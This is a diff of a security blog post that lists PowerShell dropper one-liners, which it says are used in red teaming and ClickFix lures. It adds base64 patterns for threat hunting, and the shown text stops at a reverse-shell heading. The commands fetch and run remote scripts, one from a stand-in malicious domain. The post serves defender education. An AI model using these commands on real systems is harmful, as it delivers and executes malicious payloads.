lvl0socanalyst/lvl0socanalyst.github.io/_posts/2025-06-16-my-third-post.md

 ## Red teaming powershell scripts.
 Droppers and more.

+Bunch of potentially malicious powershell commands that are helpful in Red teaming but also useful for defenders to know.
+Seeing these commands in history is usually a sign of a successful compromise.
+However, a lot of these commands have legitimate administrative use as well.

 --- Threat Hunting Patterns ---
 Base64 is deterministic.
 Meaning there is no randomness.
-So, identifying patterns is important when threat hunting and creating SIEM rules.
+Identifying B64 patterns is important when threat hunting and creating SIEM rules.
 - SQBuAHYAbwBrAGUALQBX (Invoke-WebRequest)
 - aQBlAHgAIAAoAE4AZQB3 (iex (New-Object Net.WebClient))

 ### Droppers
+Commonly used in Clickfix Prompts.
 --- Unencoded Droppers ---
 - ``` powershell -Command "Invoke-WebRequest -Uri 'https://google.com/safe-script.ps1' -OutFile $env:TEMP\Word.ps1; & $env:TEMP\Word.ps1" ``` (Downloads to disk)
 - ``` powershell -Command "iex(New-Object Net.WebClient).DownloadString('https://google.com/safe-script.ps1')" ``` (Downloads to memory)
 - ``` powershell -Command certutil -urlcache -split -f https://google.com/safe-script.ps1 payload.exe``` (LOLBAS Download)
-- ``` powershell iwr maliciousdomain.com | iex ``` ()
+- ``` powershell iwr maliciousdomain.com | iex ``` (Runs response in memory)

 ### Reverse Shell One-Liners
 --- TCP Rev Shell ---